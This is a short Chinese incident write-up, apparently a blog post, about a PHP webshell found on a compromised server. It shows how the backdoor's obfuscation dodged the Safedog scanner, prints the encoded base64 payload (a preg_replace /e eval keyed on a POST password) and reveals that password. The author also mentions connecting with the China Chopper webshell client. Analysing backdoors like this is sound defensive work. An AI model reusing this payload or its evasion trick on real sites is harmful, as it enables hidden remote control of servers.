一次巡查服务器的时候,发现网站存在漏洞,并已被植入后门,因为服务器有安全狗,由此断定后门代码是免杀的。

首先我们看看加密的源码:

点击查看原图

其中加色部分$drx.$ydd.$hq.$qvz按照排列依次拼接:
“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgo
Ii9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”这样的一串不规则的乱码。
现在的程序就变成了这样:
点击查看原图

就算不懂PHP源代码都能看出,
$rc = str_replace("v","","svtvr_rveplvavce");"svtvr_rveplvavce"中去掉“v”刚好就是“str_replace”
那么下面这段加密内容也同样要去掉多余“gc”
“CiRoaCAgc9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIigc4icgcCIuImwiLiJhgcIi4iYyIuImUiOgcwokaGgoI
i9bZGlzY3V6XSgc9lIiwkX1BPUgc1RbJ2gcxvdnZgcldSddLCJBY2Nlc3MgciKTsK”
得到一下base64_decode真实的加密内容。
“CiRoaCA9ICJwIi4iciIuImUiLiJnIi4iXyIuInIiLiJlIi4icCIuImwiLiJhIi4iYyIuImUiOwokaGgoIi9bZGlzY3V
6XS9lIiwkX1BPU1RbJ2xvdnZldSddLCJBY2Nlc3MiKTsK"
我们在通过base64_decode解密刚才获取的内容看看:
点击查看原图

那么真实的密码就暴露了"lovveu"
在用中国菜刀连接,测试密码确实正确。